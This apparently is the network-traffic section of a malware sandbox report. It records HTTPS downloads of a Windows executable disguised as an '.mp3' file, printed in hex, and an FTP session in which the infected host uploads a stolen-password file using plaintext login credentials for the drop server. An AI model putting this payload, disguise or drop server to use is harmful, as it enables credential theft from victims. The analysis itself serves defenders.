                                            2024-10-01 05:31:42 UTC7982INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                            Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                            2024-10-01 05:31:42 UTC8000INData Raw: 30 30 30 34 37 42 38 46 30 32 30 30 30 34 36 31 37 45 42 43 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 31 30 30 30 30 32 42 38 30 34 32 30 30 30 30 30 34 32 30 30 35 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 34 39 30 32 30 30 30 34 33 41 45 38 46 38 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30 33 38 44 44 46 38 46 46 46 46 32 30 30 32 39 31 42 39 42 42 36 35 32 30 31 43 43 30 34 36 31 42 36 31 37 45 35 31 30 32 30 30 30 34 37 42 39 34 30 32 30 30 30 34 36 31 37 45 42 43 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 30 42 45 41 45 41 31 41 37 32 30 39 37 41 35 31 38 41 35 36 31 37 45 35 31 30 32 30 30 30 34 37 42 34 39 30 32 30 30 30 34 36 31 37 45 42 43 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 32 30 30 30
                                            Data Ascii: 00047B8F020004617EBC020004283F090006281100002B804200000420050000007E510200047B490200043AE8F8FFFF26200200000038DDF8FFFF200291B9BB65201CC0461B617E510200047B94020004617EBC020004283F09000620BEAEA1A72097A518A5617E510200047B49020004617EBC020004283F0900062812000
                                            2024-10-01 05:31:42 UTC8000INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 32 32 30 30 31 34 41 35 34 33 30 30 30 30 30 32 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30
                                            Data Ascii: 00000000000000002A220014A5430000022A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A000000133003000400000000000
                                            2024-10-01 05:31:42 UTC8000INData Raw: 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 39 37 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 32 46 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 37 32 41 34 31 31 43 30 30 30 30 30 30 30 30 30 30 30 30 33 38 30 30 30 30 30 30 33 32 30 32 30 30 30 30 36 41 30 32 30 30 30 30 33 41 30 30 30 30 30 30 31 42 30 30 30 30 30 31 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 31 30 33 30 30 30 36 32 30 30
                                            Data Ascii: 000038C1FFFFFF2A7E9702000428AB08000620000000007E510200047B2F02000439A2FFFFFF2620010000003897FFFFFF120000172A000000120000142A0000000330080004000000000000000000172A411C00000000000038000000320200006A0200003A0000001B0000011330030080000000010000112881030006200
                                            2024-10-01 05:31:42 UTC8000INData Raw: 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 31 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 30 36 30 30 30 30 30 30 32 46 30 30 30 30 30 30 30 35 30 30 30 30 30 30 33 38 30 31 30 30 30 30 30 30 32 41 37 45 39 38 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 36 35 30 32 30 30 30 34 33 39 43 42 46 46 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30 33 38 43 30 46 46 46 46 46 46 37 45 39 37 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 38 32 30 32 30 30 30 34 33 41 41 32 46
                                            Data Ascii: 2A13300300800000000100001128810300062001000000FE0E00003800000000FE0C00004503000000060000002F0000000500000038010000002A7E9802000428AF08000620020000007E510200047B6502000439CBFFFFFF26200200000038C0FFFFFF7E9702000428AB08000620000000007E510200047B820200043AA2F
                                            2024-10-01 05:31:42 UTC8000INData Raw: 30 30 30 34 31 34 46 45 30 31 32 41 30 30 30 30 30 30 33 36 32 42 30 35 32 38 43 37 37 32 30 33 35 43 37 45 34 44 30 31 30 30 30 34 32 41 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 34 31 33 34 30 30 30 30 30 32 30 30 30 30 30 30 39 45 30 30 30 30 30 30 41 37 30 30 30 30 30 30 34 35 30 31 30 30 30 30 36 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 36 32 30 30 30 30 30 30 34 36 30 31 30
                                            Data Ascii: 000414FE012A000000362B0528C772035C7E4D0100042A00001330030004000000000000000000142A1330040004000000000000000000142A1330050004000000000000000000002A0330080004000000000000000000142A41340000020000009E000000A7000000450100006300000000000000020000006200000046010
                                            2024-10-01 05:31:42 UTC8000INData Raw: 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 46 30 41 31 46 30 46 31 46 33 37 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 37 31 46 31 35 31 46 33 38 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 45 31 43 31 46 33 39 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 46 31 46 30 41 31 46 33 41 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 43 31 46 30 46 31 46 33 42 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 43 30 33 30
                                            Data Ascii: 120511060911041F0A1F0F1F3706286C03000612041105110609171F151F3806286C03000612031104110511061E1C1F3906286C030006120609110411051F0F1F0A1F3A06286C030006120511060911041C1F0F1F3B06286C030006120411051106091F0D1F151F3C06286C03000612031104110511061A1C1F3D06286C030
                                            2024-10-01 05:31:42 UTC8000INData Raw: 46 45 30 43 30 33 30 30 32 30 30 43 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 32 30 39 37 30 30 30 30 30 30 32 30 34 30 30 30 30 30 30 30 35 39 46 45 30 45 32 37 30 30 46 45 30 43 30 33 30 30 32 30 30 43 30 30 30 30 30 30 46 45 30 43 32 37 30 30 39 43 32 30 36 46 30 30 30 30 30 30 32 30 33 42 30 30 30 30 30 30 35 38 46 45 30 45 31 31 30 30 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 32 30 44 35 30 30 30 30 30 30 32 30 34 37 30 30 30 30 30 30 35 39 39 43 32 30 33 31 30 30 30 30 30 30 32 30 32 35 30 30 30 30 30 30 35 38 46 45 30 45 31 31 30 30 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 46 45 30 43 30 33 30 30 32 30 30
                                            Data Ascii: FE0C0300200C000000FE0C11009C2097000000204000000059FE0E2700FE0C0300200C000000FE0C27009C206F000000203B00000058FE0E1100FE0C0300200D000000FE0C11009CFE0C0300200D00000020D50000002047000000599C2031000000202500000058FE0E1100FE0C0300200D000000FE0C11009CFE0C0300200
                                            2024-10-01 05:31:42 UTC8000INData Raw: 32 35 31 37 32 38 42 43 30 33 30 30 30 36 31 31 30 30 31 31 30 37 32 38 42 44 30 33 30 30 30 36 31 33 31 38 32 38 42 45 30 33 30 30 30 36 31 33 30 31 31 31 30 31 31 31 31 38 31 37 37 33 45 36 30 30 30 30 30 41 32 35 31 31 32 42 31 36 31 31 32 42 38 45 36 39 32 38 42 46 30 33 30 30 30 36 32 35 32 38 43 30 30 33 30 30 30 36 37 45 37 38 30 31 30 30 30 34 32 38 43 31 30 33 30 30 30 36 31 31 30 31 32 38 43 32 30 33 30 30 30 36 32 38 43 33 30 33 30 30 30 36 32 38 43 34 30 33 30 30 30 36 31 31 30 31 32 38 43 35 30 33 30 30 30 36 32 38 43 35 30 33 30 30 30 36 32 38 43 36 30 33 30 30 30 36 32 30 30 30 30 30 30 30 30 30 32 38 44 38 30 33 30 30 30 36 33 41 30 46 30 30 30 30 30 30 32 36 32 30 30 30 30 30 30 30 30 30 33 38 30 34 30 30 30 30 30 30 46 45 30 43 30 42 30
                                            Data Ascii: 251728BC0300061100110728BD030006131828BE0300061301110111181773E600000A25112B16112B8E6928BF0300062528C00300067E7801000428C1030006110128C203000628C303000628C4030006110128C503000628C503000628C6030006200000000028D80300063A0F0000002620000000003804000000FE0C0B0
                                            2024-10-01 05:31:42 UTC8000INData Raw: 32 33 37 45 33 46 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 33 38 30 45 30 30 30 30 30 30 31 31 32 33 37 45 34 30 30 31 30 30 30 41 31 31 32 35 36 46 34 31 30 31 30 30 30 41 31 31 32 35 31 37 35 38 31 33 32 35 31 31 32 35 31 31 32 30 33 46 38 33 46 46 46 46 46 46 31 31 32 33 37 45 34 32 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 31 31 32 33 31 31 31 44 33 41 30 41 30 30 30 30 30 30 37 45 34 33 30 31 30 30 30 41 33 38 30 35 30 30 30 30 30 30 37 45 34 34 30 31 30 30 30 41 31 31 31 45 36 46 34 35 30 31 30 30 30 41 31 31 32 33 37 45 34 36 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 31 31 31 41 31 34 31 31 32 32 30 36 36 46 34 37 30 31 30 30 30 41 36 46 31 38 30 31 30 30 30 41 44 44 30 36 30 30 30 30 30 30 32 36 44 44 30 30 30 30 30 30 30 30 31
                                            Data Ascii: 237E3F01000A6F3C01000A380E00000011237E4001000A11256F4101000A112517581325112511203F83FFFFFF11237E4201000A6F3C01000A1123111D3A0A0000007E4301000A38050000007E4401000A111E6F4501000A11237E4601000A6F3C01000A111A141122066F4701000A6F1801000ADD0600000026DD000000001


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.84971467.212.175.1624434260C:\Users\user\AppData\Roaming\Xpnzea.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-01 05:31:50 UTC84OUTGET /servex/Evzbwt.mp3 HTTP/1.1
                                            Host: wymascensores.com
                                            Connection: Keep-Alive
                                            2024-10-01 05:31:50 UTC210INHTTP/1.1 200 OK
                                            Date: Tue, 01 Oct 2024 05:31:49 GMT
                                            Server: Apache
                                            Last-Modified: Mon, 30 Sep 2024 09:28:09 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 1914880
                                            Connection: close
                                            Content-Type: audio/mpeg
                                            2024-10-01 05:31:50 UTC7982INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                            Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                            2024-10-01 05:31:50 UTC8000INData Raw: 30 30 30 34 37 42 38 46 30 32 30 30 30 34 36 31 37 45 42 43 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 31 30 30 30 30 32 42 38 30 34 32 30 30 30 30 30 34 32 30 30 35 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 34 39 30 32 30 30 30 34 33 41 45 38 46 38 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30 33 38 44 44 46 38 46 46 46 46 32 30 30 32 39 31 42 39 42 42 36 35 32 30 31 43 43 30 34 36 31 42 36 31 37 45 35 31 30 32 30 30 30 34 37 42 39 34 30 32 30 30 30 34 36 31 37 45 42 43 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 30 42 45 41 45 41 31 41 37 32 30 39 37 41 35 31 38 41 35 36 31 37 45 35 31 30 32 30 30 30 34 37 42 34 39 30 32 30 30 30 34 36 31 37 45 42 43 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 32 30 30 30
                                            Data Ascii: 00047B8F020004617EBC020004283F090006281100002B804200000420050000007E510200047B490200043AE8F8FFFF26200200000038DDF8FFFF200291B9BB65201CC0461B617E510200047B94020004617EBC020004283F09000620BEAEA1A72097A518A5617E510200047B49020004617EBC020004283F0900062812000
                                            2024-10-01 05:31:50 UTC8000INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 32 32 30 30 31 34 41 35 34 33 30 30 30 30 30 32 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30
                                            Data Ascii: 00000000000000002A220014A5430000022A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A000000133003000400000000000
                                            2024-10-01 05:31:50 UTC8000INData Raw: 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 39 37 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 32 46 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 37 32 41 34 31 31 43 30 30 30 30 30 30 30 30 30 30 30 30 33 38 30 30 30 30 30 30 33 32 30 32 30 30 30 30 36 41 30 32 30 30 30 30 33 41 30 30 30 30 30 30 31 42 30 30 30 30 30 31 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 31 30 33 30 30 30 36 32 30 30
                                            Data Ascii: 000038C1FFFFFF2A7E9702000428AB08000620000000007E510200047B2F02000439A2FFFFFF2620010000003897FFFFFF120000172A000000120000142A0000000330080004000000000000000000172A411C00000000000038000000320200006A0200003A0000001B0000011330030080000000010000112881030006200
                                            2024-10-01 05:31:50 UTC8000INData Raw: 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 31 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 30 36 30 30 30 30 30 30 32 46 30 30 30 30 30 30 30 35 30 30 30 30 30 30 33 38 30 31 30 30 30 30 30 30 32 41 37 45 39 38 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 36 35 30 32 30 30 30 34 33 39 43 42 46 46 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30 33 38 43 30 46 46 46 46 46 46 37 45 39 37 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 38 32 30 32 30 30 30 34 33 41 41 32 46
                                            Data Ascii: 2A13300300800000000100001128810300062001000000FE0E00003800000000FE0C00004503000000060000002F0000000500000038010000002A7E9802000428AF08000620020000007E510200047B6502000439CBFFFFFF26200200000038C0FFFFFF7E9702000428AB08000620000000007E510200047B820200043AA2F
                                            2024-10-01 05:31:50 UTC8000INData Raw: 30 30 30 34 31 34 46 45 30 31 32 41 30 30 30 30 30 30 33 36 32 42 30 35 32 38 43 37 37 32 30 33 35 43 37 45 34 44 30 31 30 30 30 34 32 41 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 34 31 33 34 30 30 30 30 30 32 30 30 30 30 30 30 39 45 30 30 30 30 30 30 41 37 30 30 30 30 30 30 34 35 30 31 30 30 30 30 36 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 36 32 30 30 30 30 30 30 34 36 30 31 30
                                            Data Ascii: 000414FE012A000000362B0528C772035C7E4D0100042A00001330030004000000000000000000142A1330040004000000000000000000142A1330050004000000000000000000002A0330080004000000000000000000142A41340000020000009E000000A7000000450100006300000000000000020000006200000046010
                                            2024-10-01 05:31:50 UTC8000INData Raw: 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 46 30 41 31 46 30 46 31 46 33 37 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 37 31 46 31 35 31 46 33 38 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 45 31 43 31 46 33 39 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 46 31 46 30 41 31 46 33 41 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 43 31 46 30 46 31 46 33 42 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 43 30 33 30
                                            Data Ascii: 120511060911041F0A1F0F1F3706286C03000612041105110609171F151F3806286C03000612031104110511061E1C1F3906286C030006120609110411051F0F1F0A1F3A06286C030006120511060911041C1F0F1F3B06286C030006120411051106091F0D1F151F3C06286C03000612031104110511061A1C1F3D06286C030
                                            2024-10-01 05:31:50 UTC8000INData Raw: 46 45 30 43 30 33 30 30 32 30 30 43 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 32 30 39 37 30 30 30 30 30 30 32 30 34 30 30 30 30 30 30 30 35 39 46 45 30 45 32 37 30 30 46 45 30 43 30 33 30 30 32 30 30 43 30 30 30 30 30 30 46 45 30 43 32 37 30 30 39 43 32 30 36 46 30 30 30 30 30 30 32 30 33 42 30 30 30 30 30 30 35 38 46 45 30 45 31 31 30 30 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 32 30 44 35 30 30 30 30 30 30 32 30 34 37 30 30 30 30 30 30 35 39 39 43 32 30 33 31 30 30 30 30 30 30 32 30 32 35 30 30 30 30 30 30 35 38 46 45 30 45 31 31 30 30 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 46 45 30 43 30 33 30 30 32 30 30
                                            Data Ascii: FE0C0300200C000000FE0C11009C2097000000204000000059FE0E2700FE0C0300200C000000FE0C27009C206F000000203B00000058FE0E1100FE0C0300200D000000FE0C11009CFE0C0300200D00000020D50000002047000000599C2031000000202500000058FE0E1100FE0C0300200D000000FE0C11009CFE0C0300200
                                            2024-10-01 05:31:50 UTC8000INData Raw: 32 35 31 37 32 38 42 43 30 33 30 30 30 36 31 31 30 30 31 31 30 37 32 38 42 44 30 33 30 30 30 36 31 33 31 38 32 38 42 45 30 33 30 30 30 36 31 33 30 31 31 31 30 31 31 31 31 38 31 37 37 33 45 36 30 30 30 30 30 41 32 35 31 31 32 42 31 36 31 31 32 42 38 45 36 39 32 38 42 46 30 33 30 30 30 36 32 35 32 38 43 30 30 33 30 30 30 36 37 45 37 38 30 31 30 30 30 34 32 38 43 31 30 33 30 30 30 36 31 31 30 31 32 38 43 32 30 33 30 30 30 36 32 38 43 33 30 33 30 30 30 36 32 38 43 34 30 33 30 30 30 36 31 31 30 31 32 38 43 35 30 33 30 30 30 36 32 38 43 35 30 33 30 30 30 36 32 38 43 36 30 33 30 30 30 36 32 30 30 30 30 30 30 30 30 30 32 38 44 38 30 33 30 30 30 36 33 41 30 46 30 30 30 30 30 30 32 36 32 30 30 30 30 30 30 30 30 30 33 38 30 34 30 30 30 30 30 30 46 45 30 43 30 42 30
                                            Data Ascii: 251728BC0300061100110728BD030006131828BE0300061301110111181773E600000A25112B16112B8E6928BF0300062528C00300067E7801000428C1030006110128C203000628C303000628C4030006110128C503000628C503000628C6030006200000000028D80300063A0F0000002620000000003804000000FE0C0B0
                                            2024-10-01 05:31:50 UTC8000INData Raw: 32 33 37 45 33 46 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 33 38 30 45 30 30 30 30 30 30 31 31 32 33 37 45 34 30 30 31 30 30 30 41 31 31 32 35 36 46 34 31 30 31 30 30 30 41 31 31 32 35 31 37 35 38 31 33 32 35 31 31 32 35 31 31 32 30 33 46 38 33 46 46 46 46 46 46 31 31 32 33 37 45 34 32 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 31 31 32 33 31 31 31 44 33 41 30 41 30 30 30 30 30 30 37 45 34 33 30 31 30 30 30 41 33 38 30 35 30 30 30 30 30 30 37 45 34 34 30 31 30 30 30 41 31 31 31 45 36 46 34 35 30 31 30 30 30 41 31 31 32 33 37 45 34 36 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 31 31 31 41 31 34 31 31 32 32 30 36 36 46 34 37 30 31 30 30 30 41 36 46 31 38 30 31 30 30 30 41 44 44 30 36 30 30 30 30 30 30 32 36 44 44 30 30 30 30 30 30 30 30 31
                                            Data Ascii: 237E3F01000A6F3C01000A380E00000011237E4001000A11256F4101000A112517581325112511203F83FFFFFF11237E4201000A6F3C01000A1123111D3A0A0000007E4301000A38050000007E4401000A111E6F4501000A11237E4601000A6F3C01000A111A141122066F4701000A6F1801000ADD0600000026DD000000001


                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Oct 1, 2024 07:31:31.443440914 CEST21497065.2.84.236192.168.2.8220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 08:31. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                            Oct 1, 2024 07:31:31.443697929 CEST4970621192.168.2.85.2.84.236USER fgghv@alternatifplastik.com
                                            Oct 1, 2024 07:31:31.663798094 CEST21497065.2.84.236192.168.2.8331 User fgghv@alternatifplastik.com OK. Password required
                                            Oct 1, 2024 07:31:31.663960934 CEST4970621192.168.2.85.2.84.236PASS Fineboy777@
                                            Oct 1, 2024 07:31:31.951602936 CEST21497065.2.84.236192.168.2.8230 OK. Current restricted directory is /
                                            Oct 1, 2024 07:31:32.171857119 CEST21497065.2.84.236192.168.2.8504 Unknown command
                                            Oct 1, 2024 07:31:32.172070980 CEST4970621192.168.2.85.2.84.236PWD
                                            Oct 1, 2024 07:31:32.392071962 CEST21497065.2.84.236192.168.2.8257 "/" is your current location
                                            Oct 1, 2024 07:31:32.394761086 CEST4970621192.168.2.85.2.84.236TYPE I
                                            Oct 1, 2024 07:31:32.614883900 CEST21497065.2.84.236192.168.2.8200 TYPE is now 8-bit binary
                                            Oct 1, 2024 07:31:32.618262053 CEST4970621192.168.2.85.2.84.236PASV
                                            Oct 1, 2024 07:31:32.838507891 CEST21497065.2.84.236192.168.2.8227 Entering Passive Mode (5,2,84,236,247,252)
                                            Oct 1, 2024 07:31:32.844326019 CEST4970621192.168.2.85.2.84.236STOR PW_user-841675_2024_10_01_01_31_29.html
                                            Oct 1, 2024 07:31:33.459727049 CEST21497065.2.84.236192.168.2.8150 Accepted data connection
